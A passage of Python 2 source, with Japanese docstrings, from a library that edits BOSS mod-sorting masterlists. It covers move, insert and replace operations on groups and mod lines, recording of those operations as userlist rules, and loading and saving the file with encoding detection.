def _findNameOfGroup(self, name):
"""
グループ名を再帰的に最上位グループから検索します。
見つからなかった場合は、Noneを返却します。
"""
return self.FindData(u"GroupName", name)
def _findNameOfLine(self, name):
"""
行文字列を再帰的に最上位グループから検索します。
見つからなかった場合は、Noneを返却します。
"""
return self.FindData(u"LineString", name)
def _findNameOfTarget(self, name):
"""
名称を最上位グループから検索します。グループ名に存在した場合はグループを返却します。
グループに存在しなかった場合は行文字列を検索します。
行文字列にも見つからなかった場合は、Noneを返却します。
"""
ret = None
if (isinstance(name, str)) or (isinstance(name, unicode)):
group = self._findNameOfGroup(name)
if group != None:
ret = group
else:
line = self._findNameOfLine(name)
if line != None:
ret = line.Parent()
return ret
def _findTargetOfName(self, target):
"""
渡されたオブジェクトの文字列を返却します。
*target* に渡されたオブジェクトによって動作を切り替えます。
行オブジェクト、ブロックの場合は、MODsの行を取得し名称を返却します。グループの場合は、グループ名を返却します。
該当する文字列が存在しない場合は、空の文字列を返却します。
"""
ret = u""
if (isinstance(target, str)) or (isinstance(target, unicode)):
ret = u"%s" % (target)
elif isinstance(target, Line):
ret = u"%s" % (target.LineString)
elif isinstance(target, Block):
findmod = target.GetLine(EnumLineType.MODS)
ret = u"%s" % (findmod.LineString)
elif isinstance(target, Group):
ret = u"%s" % (target.GroupName)
return ret
def _createOfTarget(self, target):
"""
渡されたオブジェクトから行オブジェクトを生成して返却します。
*target* に渡されたオブジェクトによって動作を切り替えます。
行オブジェクトの場合は、MODsの行をブロックに格納して返却します。ブロック、グループの場合は、そのまま返却します。
文字列の場合は、文字列を判定し、MODs名らしい名前の場合は行文字列として扱います。それ以外の場合はグループ名として扱います。
"""
ret = None
if (isinstance(target, str)) or (isinstance(target, unicode)):
match = regexMods.search(target)
if match is not None:
# 行文字列と判断する。
ret = Block([Line(target)])
else:
# グループ名と判断する。
ret = Group(target)
elif isinstance(target, Line):
ret = Block([target])
elif isinstance(target, Block):
ret = target
elif isinstance(target, Group):
ret = target
return ret
def _cushionGroup(self, target):
"""
渡されたオブジェクトの親グループを返却します。
*target* に渡されたオブジェクトによって動作を切り替えます。
渡されたオブジェクトがグループの場合は、そのまま返却します。
"""
ret = None
if isinstance(target, Line):
ret = target.GetParentGroup()
elif isinstance(target, Block):
ret = target.Parent()
elif isinstance(target, Group):
ret = target
return ret
def _replaceSwitchingOfTarget(self, target):
"""
渡されたオブジェクトを元に、MoveすべきかInsertすべきか判定し、対象となるオブジェクトを返却します。
内部でself._findNameOfTarget及びself._createOfTargetを呼び出します。
*target* に渡されたオブジェクトによって動作を切り替えます。
"""
move = True
targetobject = None
targetname = self._findTargetOfName(target)
if len(targetname) != 0:
targetobject = self._findNameOfTarget(targetname)
if targetobject == None:
# 存在しなければ、Insertと判断しオブジェクトの生成を行う。
targetobject = self._createOfTarget(target)
move = False
return (move, targetobject)
def _moveBefore(self, param1, param1target, param2, param2target):
"""
MoveBeforeの処理を行います。
"""
param1target.Parent().DeleteChild(param1target)
param2target.Parent().InsertChildBefore(param2target, param1target)
self._onOperationRecord(u"MoveBefore", param1, param1target, param2, param2target)
return self
def _moveAfter(self, param1, param1target, param2, param2target):
"""
MoveAfterの処理を行います。
"""
param1target.Parent().DeleteChild(param1target)
param2target.Parent().InsertChildAfter(param2target, param1target)
self._onOperationRecord(u"MoveAfter", param1, param1target, param2, param2target)
return self
def _moveTop(self, param1, param1target, param2, param2target):
"""
MoveTopの処理を行います。
"""
param1target.Parent().DeleteChild(param1target)
self._cushionGroup(param2target).InsertChildBefore(self._cushionGroup(param2target)._getTopBaseChild(), param1target)
self._onOperationRecord(u"MoveTop", param1, param1target, param2, param2target)
return self
def _moveBottom(self, param1, param1target, param2, param2target):
"""
MoveBottomの処理を行います。
"""
param1target.Parent().DeleteChild(param1target)
self._cushionGroup(param2target).InsertChildAfter(self._cushionGroup(param2target)._getBottomBaseChild(), param1target)
self._onOperationRecord(u"MoveBottom", param1, param1target, param2, param2target)
return self
def _insertBefore(self, param1, param1target, param2, param2target):
"""
InsertBeforeの処理を行います。
"""
param2target.Parent().InsertChildBefore(param2target, param1target)
self._onOperationRecord(u"InsertBefore", param1, param1target, param2, param2target)
return self
def _insertAfter(self, param1, param1target, param2, param2target):
"""
InsertAfterの処理を行います。
"""
param2target.Parent().InsertChildAfter(param2target, param1target)
self._onOperationRecord(u"InsertAfter", param1, param1target, param2, param2target)
return self
def _insertTop(self, param1, param1target, param2, param2target):
"""
InsertTopの処理を行います。
"""
self._cushionGroup(param2target).InsertChildBefore(self._cushionGroup(param2target)._getTopBaseChild(), param1target)
self._onOperationRecord(u"InsertTop", param1, param1target, param2, param2target)
return self
def _insertBottom(self, param1, param1target, param2, param2target):
"""
InsertBottomの処理を行います。
"""
self._cushionGroup(param2target).InsertChildAfter(self._cushionGroup(param2target)._getBottomBaseChild(), param1target)
self._onOperationRecord(u"InsertBottom", param1, param1target, param2, param2target)
return self
def _appendLine(self, param1, param1target, param2, param2target):
"""
AppendLineの処理を行います。
"""
param2target.AddChild(param1target)
self._onOperationRecord(u"AppendLine", param1, param1target, param2, param2target)
return self
def _replaceLine(self, param1, param1target, param2, param2target):
"""
ReplaceLineの処理を行います。
"""
deleteblock = []
for line in param2target.EachChilds():
if not line.IsType(EnumLineType.MODS):
deleteblock += [line]
for line in deleteblock:
param2target.DeleteChild(line)
param2target.AddChild(param1target)
self._onOperationRecord(u"ReplaceLine", param1, param1target, param2, param2target)
return self
def MoveBefore(self, srcname, basename):
"""
*srcname* で指定した名称のオブジェクトを、 *basename* で指定した名称のオブジェクトの **前** に移動します。
これは、ユーザーリストの「OVERRIDE - BEFORE」の操作に該当します。
:param string srcname: 移動対象の名称
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._findNameOfTarget(srcname)
if srctarget == None:
raise KeyError, "The specified name is not found: %s" % (srcname)
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._moveBefore(srcname, srctarget, basename, basetarget)
return self
def MoveAfter(self, srcname, basename):
"""
*srcname* で指定した名称のオブジェクトを、 *basename* で指定した名称のオブジェクトの **後** に移動します。
これは、ユーザーリストの「OVERRIDE - AFTER」の操作に該当します。
:param string srcname: 移動対象の名称
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._findNameOfTarget(srcname)
if srctarget == None:
raise KeyError, "The specified name is not found: %s" % (srcname)
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._moveAfter(srcname, srctarget, basename, basetarget)
return self
def MoveTop(self, srcname, basename):
"""
*srcname* で指定した名称のオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ先頭** に移動します。
これは、ユーザーリストの「OVERRIDE - TOP」の操作に該当します。
:param string srcname: 移動対象の名称
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._findNameOfTarget(srcname)
if srctarget == None:
raise KeyError, "The specified name is not found: %s" % (srcname)
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._moveTop(srcname, srctarget, basename, basetarget)
return self
def MoveBottom(self, srcname, basename):
"""
*srcname* で指定した名称のオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ末尾** に移動します。
これは、ユーザーリストの「OVERRIDE - BOTTOM」の操作に該当します。
:param string srcname: 移動対象の名称
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._findNameOfTarget(srcname)
if srctarget == None:
raise KeyError, "The specified name is not found: %s" % (srcname)
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._moveBottom(srcname, srctarget, basename, basetarget)
return self
def InsertBefore(self, newobject, basename):
"""
*newobject* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **前** に移動します。
これは、ユーザーリストの「ADD - BEFORE」の操作に該当します。
*newobject* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobject: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._createOfTarget(newobject)
if srctarget == None:
raise TypeError, "expected str, unicode, Line, Block or Group."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._insertBefore(newobject, srctarget, basename, basetarget)
return self
def InsertAfter(self, newobject, basename):
"""
*newobject* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **後** に移動します。
これは、ユーザーリストの「ADD - AFTER」の操作に該当します。
*newobject* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobject: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._createOfTarget(newobject)
if srctarget == None:
raise TypeError, "expected str, unicode, Line, Block or Group."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._insertAfter(newobject, srctarget, basename, basetarget)
return self
def InsertTop(self, newobject, basename):
"""
*newobject* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ先頭** に移動します。
これは、ユーザーリストの「ADD - TOP」の操作に該当します。
*newobject* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobject: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._createOfTarget(newobject)
if srctarget == None:
raise TypeError, "expected str, unicode, Line, Block or Group."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._insertTop(newobject, srctarget, basename, basetarget)
return self
def InsertBottom(self, newobject, basename):
"""
*newobject* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ末尾** に移動します。
これは、ユーザーリストの「ADD - BOTTOM」の操作に該当します。
*newobject* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobject: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._createOfTarget(newobject)
if srctarget == None:
raise TypeError, "expected str, unicode, Line, Block or Group."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._insertBottom(newobject, srctarget, basename, basetarget)
return self
def AppendLine(self, newlinestring, basename):
"""
*newlinestring* で指定した行文字列を、 *basename* で指定した名称のオブジェクトにメッセージを **追加** します。
これは、ユーザーリストの「FOR - APPEND」の操作に該当します。
:param string newlinestring: 挿入対象の名称
:param string basename: 移動先のソート基準の名称
"""
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
newline = Line(newlinestring)
self._appendLine(newlinestring, newline, basename, basetarget)
return self
def ReplaceLine(self, newlinestring, basename):
"""
*newlinestring* で指定した行文字列を、 *basename* で指定した名称のオブジェクトのメッセージを **置換** します。
これは、ユーザーリストの「FOR - REPLACE」の操作に該当します。
:param string newlinestring: 挿入対象の名称
:param string basename: 移動先のソート基準の名称
"""
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
newline = Line(newlinestring)
self._replaceLine(newlinestring, newline, basename, basetarget)
return self
def ReplaceBefore(self, newobjectorname, basename):
"""
*newobjectorname* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **前** に **移動又は挿入** します。
これは、既にマスタリストに *newobjectorname* で指定したオブジェクトが存在する場合は、
ユーザーリストの「OVERRIDE - BEFORE」の操作を行い、存在しない場合は、「ADD - BEFORE」の操作を行います。
*newobjectorname* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobjectorname: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
(move, srctarget) = self._replaceSwitchingOfTarget(newobjectorname)
if srctarget == None:
raise KeyError, "Invalid target was supplied."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
if move:
self._moveBefore(newobjectorname, srctarget, basename, basetarget)
else:
self._insertBefore(newobjectorname, srctarget, basename, basetarget)
return self
def ReplaceAfter(self, newobjectorname, basename):
"""
*newobjectorname* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **後** に **移動又は挿入** します。
これは、既にマスタリストに *newobjectorname* で指定したオブジェクトが存在する場合は、
ユーザーリストの「OVERRIDE - AFTER」の操作を行い、存在しない場合は、「ADD - AFTER」の操作を行います。
*newobjectorname* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobjectorname: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
(move, srctarget) = self._replaceSwitchingOfTarget(newobjectorname)
if srctarget == None:
raise KeyError, "Invalid target was supplied."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
if move:
self._moveAfter(newobjectorname, srctarget, basename, basetarget)
else:
self._insertAfter(newobjectorname, srctarget, basename, basetarget)
return self
def ReplaceTop(self, newobjectorname, basename):
"""
*newobjectorname* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ先頭** に **移動又は挿入** します。
これは、既にマスタリストに *newobjectorname* で指定したオブジェクトが存在する場合は、
ユーザーリストの「OVERRIDE - TOP」の操作を行い、存在しない場合は、「ADD - TOP」の操作を行います。
*newobjectorname* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobjectorname: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
(move, srctarget) = self._replaceSwitchingOfTarget(newobjectorname)
if srctarget == None:
raise KeyError, "Invalid target was supplied."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
if move:
self._moveTop(newobjectorname, srctarget, basename, basetarget)
else:
self._insertTop(newobjectorname, srctarget, basename, basetarget)
return self
def ReplaceBottom(self, newobjectorname, basename):
"""
*newobjectorname* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ末尾** に **移動又は挿入** します。
これは、既にマスタリストに *newobjectorname* で指定したオブジェクトが存在する場合は、
ユーザーリストの「OVERRIDE - BOTTOM」の操作を行い、存在しない場合は、「ADD - BOTTOM」の操作を行います。
*newobjectorname* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobjectorname: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
(move, srctarget) = self._replaceSwitchingOfTarget(newobjectorname)
if srctarget == None:
raise KeyError, "Invalid target was supplied."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
if move:
self._moveBottom(newobjectorname, srctarget, basename, basetarget)
else:
self._insertBottom(newobjectorname, srctarget, basename, basetarget)
return self
def _onOperationRecord(self, operationname, param1, param1target, param2, param2target):
"""
マスタリストの操作を行った場合に、呼び出されます。
これは、操作した内容を記録するために用意されています。
:param string operationname: 操作の名称
:param (string,Group,Block,Line) param1: 操作のパラメータ1(文字列及びオブジェクト)
:param string param1target: パラメータ1のオブジェクト
:param (string,Group,Block,Line) param2: 操作のパラメータ2(文字列及びオブジェクト)
:param string param2target: パラメータ2のオブジェクト
"""
if self._recording:
# 記録中なら実行する。
param1type = u""
if isinstance(param1target, Line):
param1type = u"MODs"
elif isinstance(param1target, Block):
param1type = u"MODs"
elif isinstance(param1target, Group):
param1type = u"Group"
param2type = u""
if isinstance(param2target, Line):
param2type = u"MODs"
elif isinstance(param2target, Block):
param2type = u"MODs"
elif isinstance(param2target, Group):
param2type = u"Group"
recordstring = u"%sFrom%sTo%s" % (operationname, param1type, param2type)
param1string = self._findTargetOfName(param1)
param2string = self._findTargetOfName(param2)
self._archiverecord += [
{
u"Record" : recordstring,
u"Param1" : param1string,
u"Param2" : param2string
}
]
return self
def ClearRecord(self):
"""
操作記録した内容を全て破棄します。
詳しくは \ :meth:`BeginRecord`\ を参照して下さい。
"""
self._archiverecord = []
return self
def BeginRecord(self):
"""
操作記録を開始します。
BeginRecordを呼び出した後に、マスタリストへの操作を行った場合、内部に操作記録を残します。
この操作記録から、 \ :meth:`GenerateUserlistFromRecord`\ を使ってユーザーリスト定義を作ることができます。
記録するマスタリストへの操作は、以下の操作が該当します。
「 \ :meth:`MoveBefore`\ \ :meth:`MoveAfter`\ \ :meth:`MoveTop`\ \ :meth:`MoveBottom`\ 」
「 \ :meth:`InsertBefore`\ \ :meth:`InsertAfter`\ \ :meth:`InsertTop`\ \ :meth:`InsertBottom`\ 」
「 \ :meth:`AppendLine`\ \ :meth:`ReplaceLine`\ 」
また、内部でInsertかMoveのどちらかに切り替えるReplace文も該当します。(実際に内部で実行した操作が記録されます。)
「 \ :meth:`ReplaceBefore`\ \ :meth:`ReplaceAfter`\ \ :meth:`ReplaceTop`\ \ :meth:`ReplaceBottom`\ 」
また、ユーザーリスト操作による「 \ :meth:`Operater`\ 」による変更も該当します。
ただし、この場合はGenerateUserlistFromRecordで生成されるユーザーリスト定義は、Operaterに渡した定義と必ずしも一致するとは限りません。
(特にコメント行や改行などの定義は定義生成時に、除外されるでしょう。)
上記以外の、\ :meth:`LinkedTreeObject.LinkedTreeObject.AddChild`\ などのオブジェクト操作にて追加した場合は、記録されません。
操作記録の終了を行う場合は、「 \ :meth:`EndRecord`\ 」を呼び出します。
また、記録した操作内容を破棄する場合は、「 \ :meth:`ClearRecord`\ 」を呼び出します。
"""
self._recording = True
return self
def EndRecord(self):
"""
操作記録を終了します。
詳しくは \ :meth:`BeginRecord`\ を参照して下さい。
"""
self._recording = False
return self
def GenerateUserlistFromRecord(self):
"""
操作記録によって記録した内容を元に、ユーザーリスト定義を生成します。(「ADD、OVERRIDE、FOR」などを使った構文)
操作方法を意識しない限り、BOSSでは動作しない記述が吐き出されますので注意が必要です。(特にグループの操作)
pyOssLibでは、GenerateUserlistFromRecordの出力は全てそのまま操作可能です。
操作記録について詳しくは \ :meth:`BeginRecord`\ を参照して下さい。
生成したユーザーリスト定義は \ :class:`UserlistLib.Userlist`\ クラスオブジェクトとして返却します。
:rtype: UserlistLib.Userlist
:return: 生成したユーザーリストクラスのオブジェクト
"""
ret = None
procedure = Userlist()
for record in self._archiverecord:
recordstring = record.get(u"Record", u"")
param1string = record.get(u"Param1", u"")
param2string = record.get(u"Param2", u"")
match = regexRecord.search(recordstring)
if match != None:
command = u"%s" % (match.group(1))
rule = u"%s" % (match.group(3))
sort = u"%s" % (match.group(4))
param1type = u"%s" % (match.group(6))
param2type = u"%s" % (match.group(7))
operation = UserOperation()
if command == u"AppendLine":
# ルール
operation.AddNewRuleFor(param2string)
# メッセージ
operation.AddNewMessageAppend(param1string)
elif command == u"ReplaceLine":
# ルール
operation.AddNewRuleFor(param2string)
# メッセージ
operation.AddNewMessageReplace(param1string)
else:
# ルール
if rule == u"Move":
operation.AddNewRuleOverride(param1string)
elif rule == u"Insert":
operation.AddNewRuleAdd(param1string)
#if param1type == u"Group":
# operation.AddNewRuleAddGroup(param1string)
#elif param1type == u"MODs":
# operation.AddNewRuleAdd(param1string)
# ソート
if sort == u"Before":
operation.AddNewSortBefore(param2string)
elif sort == u"After":
operation.AddNewSortAfter(param2string)
elif sort == u"Top":
operation.AddNewSortTop(param2string)
elif sort == u"Bottom":
operation.AddNewSortBottom(param2string)
procedure.AddChild(operation)
procedure.UnnecessaryMergeOperations()
for operation in procedure.EachChilds():
operation.AddNewBlank()
ret = procedure
return ret
def _operaterUserOperation(self, operation):
"""
ユーザーオペレーションオブジェクトを元にマスタリストの操作を行います。
"""
if not operation.IsValid():
raise ValueError, "Specified operation can not be performed."
ruletypestring = u""
ruleparam = None
sortparam = None
if operation.IsType(EnumCommandType.ADD):
ruletypestring = u"Insert"
ruleparamstring = operation.GetUserLine(EnumCommandType.RULE).ParamString
match = regexMods.search(ruleparamstring)
if match is not None:
# 行文字列と判断する。
ruleparam = Line(ruleparamstring)
else:
# グループ名と判断する。
ruleparam = Group(ruleparamstring)
sortparam = operation.GetUserLine(EnumCommandType.SORT).ParamString
elif operation.IsType(EnumCommandType.OVERRIDE):
ruletypestring = u"Move"
ruleparam = operation.GetUserLine(EnumCommandType.RULE).ParamString
sortparam = operation.GetUserLine(EnumCommandType.SORT).ParamString
elif operation.IsType(EnumCommandType.FOR):
ruletypestring = u""
ruleparam = operation.GetUserLine(EnumCommandType.RULE).ParamString
sortparam = None
sorttypestring = u""
if operation.IsType(EnumCommandType.BEFORE):
sorttypestring = u"Before"
elif operation.IsType(EnumCommandType.AFTER):
sorttypestring = u"After"
elif operation.IsType(EnumCommandType.TOP):
sorttypestring = u"Top"
elif operation.IsType(EnumCommandType.BOTTOM):
sorttypestring = u"Bottom"
funclists = [
u"MoveBefore",
u"MoveAfter",
u"MoveTop",
u"MoveBottom",
u"InsertBefore",
u"InsertAfter",
u"InsertTop",
u"InsertBottom",
]
funcname = u"%s%s" % (ruletypestring, sorttypestring)
if funcname in funclists:
func = getattr(self, funcname)
func(ruleparam, sortparam)
messageobjects = operation.GetUserLineAll(EnumCommandType.MESSAGE)
for messageobj in messageobjects:
messageparam1 = messageobj.ParamString
messageparam2 = self._findTargetOfName(ruleparam)
if messageobj.IsType(EnumCommandType.APPEND):
self.AppendLine(messageparam1, messageparam2)
elif messageobj.IsType(EnumCommandType.REPLACE):
self.ReplaceLine(messageparam1, messageparam2)
return self
def _operaterUserlist(self, userlist):
"""
ユーザーリストオブジェクトを元にマスタリストの操作を行います。
"""
for operation in userlist.EachChilds():
if operation.IsValid():
try:
self._operaterUserOperation(operation)
except BaseException as ex:
print u"%s\r\n %s" % (ex, operation)
return self
def Operater(self, operation):
"""
*operation* で指定したオブジェクトを元にマスタリストの操作を行います。
*operation* にはユーザーリストオブジェクト、または、ユーザーオペレーションオブジェクトを指定できます。
このとき渡されたオブジェクトがユーザーリストオブジェクトの場合、その中の有効な操作のみ実行され、無効な操作は無視されます。(実際の操作の段階で例外が発生した場合は、次のオペレーションを処理します)
渡されたオブジェクトがユーザーオペレーションオブジェクトの場合、無効な操作を実行しようとすると例外を発生します。
操作が有効か無効かの判断は、\ :meth:`UserlistLib.UserOperation.IsValid`\ で判断します。
引数に渡すことが可能なオブジェクトについては、それぞれ「 \ :class:`UserlistLib.Userlist`\ \ :class:`UserlistLib.UserOperation`\ 」を参照して下さい。
:param (UserOperation,Userlist) operation: ユーザーリスト操作情報を持つオブジェクト
"""
if isinstance(operation, UserOperation):
self._operaterUserOperation(operation)
elif isinstance(operation, Userlist):
self._operaterUserlist(operation)
else:
raise TypeError, "Specified operation can not be performed. expected UserOperation or Userlist."
return self
def Save(self, fullpathfilename = u"", encoding=None):
"""
現在の状態を指定したファイルに保存します。
ファイル名の指定を省略した場合は、最後にLoad又はSaveしたファイルに保存します。
:param string fullpathfilename: 保存するファイル名
:param string encoding: ファイルのエンコーディング(公式は「Windows-1252:'cp1252'」又は「UTF-8 BOM有:'utf-8-sig'」)
"""
if len(fullpathfilename) != 0:
self._fullpathfilename = fullpathfilename.lstrip().rstrip()
if len(self._fullpathfilename) == 0:
raise IOError, "Invalid filename."
if os.path.exists(self._fullpathfilename):
os.remove(self._fullpathfilename)
# 行データのない不要なゴミブロックを削除する。
for waste in self._getWasteBlock():
waste.Parent().DeleteChild(waste)
# エンコーディング判定
if encoding is not None:
self._encoding = encoding
#print u"Save encoding: %s" % (self._encoding)
# --------------------------------------------------
# エンコードエラー時の処理定義
# --------------------------------------------------
if getattr(self, "OnEncodingErrorFromSave", None) == None:
def _onEncodingErrorFromSave(linestring, linecount, encoding):
# コマンドプロンプトはcp932(shift-jisのMicrosoft拡張)で表示するため、暗黙の文字コード変換が行われる。
# そのため、linestringをprintすると、cp932に存在しない文字は表示できずにエラーになってしまう。
# これは回避不能なので、表示しない動作をデフォルトとする。
print u"UNICODE(%s) encoding error! skip line: %s" % (encoding, linecount)
return
self.OnEncodingErrorFromSave = _onEncodingErrorFromSave
linecount = 0
filemasterlist = codecs.open(self._fullpathfilename, "wU", self._encoding)
try:
#filemasterlist.write(self.MasterlistOutput())
for object in self.EachRecursion():
if isinstance(object, Line):
linecount += 1
linestring = u""
# --------------------------------------------------
# Encodingの変換に失敗する文字が使われている場合は削除する。
# --------------------------------------------------
try:
temp = object.LineString.encode(self._encoding)
linestring = object.LineString
except UnicodeEncodeError:
param_linestring = copy.copy(linestring)
param_linecount = copy.copy(linecount)
param_encoding = copy.copy(self._encoding)
self.OnEncodingErrorFromSave(param_linestring, param_linecount, param_encoding)
linestring = u""
linestring = u"%s\r\n" % (linestring)
filemasterlist.write(linestring)
finally:
filemasterlist.close()
return self
def Load(self, fullpathfilename = u"", encoding=None):
"""
指定したファイルからマスタリストを読み込み、構成を解析します。
ファイル名の指定を省略した場合は、最後にLoad又はSaveしたファイルから読み込みます。
*encoding* にエンコーディング文字を指定すると、指定したコードで読み込みます。省略した場合は自動判定します。
:param string fullpathfilename: 読み込むファイル名
:param string encoding: ファイルのエンコーディング(公式は「Windows-1252:'cp1252'」又は「UTF-8 BOM有:'utf-8-sig'」)
"""
if len(fullpathfilename) != 0:
self._fullpathfilename = fullpathfilename.lstrip().rstrip()
if len(self._fullpathfilename) == 0:
raise IOError, "Invalid filename."
if not os.path.exists(self._fullpathfilename):
raise IOError, "No such file."
if self.ChildCount() != 0:
# もし子供が追加されていたら、全て削除する。
for child in self.EachChilds():
self.DeleteChild(child)
# --------------------------------------------------
# エンコーディング判定
# --------------------------------------------------
if encoding is None:
detector = UniversalDetector()
detector.reset()
for line in file(self._fullpathfilename, 'rb'):
detector.feed(line)
if detector.done:
break
detector.close()
encoding = detector.result["encoding"]
self._encoding = encoding
#print u"Load encoding: %s" % (self._encoding)
# --------------------------------------------------
# デコードエラー時の処理定義
# --------------------------------------------------
if getattr(self, "OnDecodingErrorFromLoad", None) == None:
def _onDecodingErrorFromLoad(linecount, linestring, encoding):
# コマンドプロンプトはcp932(shift-jisのMicrosoft拡張)で表示するため、暗黙の文字コード変換が行われる。
# そのため、linestringをprintすると、cp932に存在しない文字は表示できずにエラーになってしまう。
# これは回避不能なので、表示しない動作をデフォルトとする。
print u"UNICODE(%s) decoding error! skip line: %s" % (encoding, linecount)
return None
self.OnDecodingErrorFromLoad = _onDecodingErrorFromLoad
# --------------------------------------------------
# 行オブジェクト生成時の処理定義
# --------------------------------------------------
if getattr(self, "OnCreateLineObject", None) == None:
def _onCreateLineObject(linecount, linestring):
# 行オブジェクトの作成(行補正機能を有効にする)
return Line(linestring, True)
self.OnCreateLineObject = _onCreateLineObject
# --------------------------------------------------
# masterlistの読み込みとオブジェクトへの展開
# --------------------------------------------------
thisGroup = self
thisBlock = Block()
thisGroup.AddChild(thisBlock)
countbegingroup = 0
countendgroup = 0
linecount = 0
filemasterlist = open(self._fullpathfilename, "rU")
#filemasterlist = codecs.open(self._fullpathfilename, "rU", "shift_jis")
try:
for linestring in filemasterlist:
if linecount == 0:
linestring = CommonLib.CutBomString(linestring)
linecount += 1
# --------------------------------------------------
# Encodingの変換に失敗する文字が使われている場合は削除する。
# --------------------------------------------------
try:
linestring = u"%s" % (unicode(linestring, self._encoding).encode("utf-8"))
except UnicodeDecodeError:
param_linecount = copy.copy(linecount)
param_linestring = copy.copy(linestring)
param_encoding = copy.copy(self._encoding)
linestring = self.OnDecodingErrorFromLoad(param_linecount, param_linestring, param_encoding)
if (isinstance(linestring, str)) or (isinstance(linestring, unicode)):
try:
linestring = u"%s" % (unicode(linestring, self._encoding).encode("utf-8"))
except UnicodeDecodeError:
linestring = u""
else:
linestring = u""
# 行オブジェクトの作成
#thisLine = Line(linestring, True)
param_linecount = copy.copy(linecount)
thisLine = self.OnCreateLineObject(param_linecount, linestring)
if not isinstance(thisLine, Line):
raise SyntaxError, "OnCreateLineObject() is an invalid object to return."
if thisLine.IsType(EnumLineType.BEGINGROUP):
countbegingroup += 1
# グループとブロックを作成して紐付ける
newGroup = Group(thisLine.BeginGroupName, None, False)
thisGroup.AddChild(newGroup)
thisBlock = Block()
newGroup.AddChild(thisBlock)
thisGroup = newGroup
if thisLine.IsType(EnumLineType.MODS):
# ブロックを作成して紐付ける
thisBlock = Block()
thisGroup.AddChild(thisBlock)
if thisLine.IsType(EnumLineType.ENDGROUP):
countendgroup += 1
if countbegingroup < countendgroup:
raise SyntaxError, "The group does not match the beginning and end."
# ブロックを作成して紐付ける
thisBlock = Block()
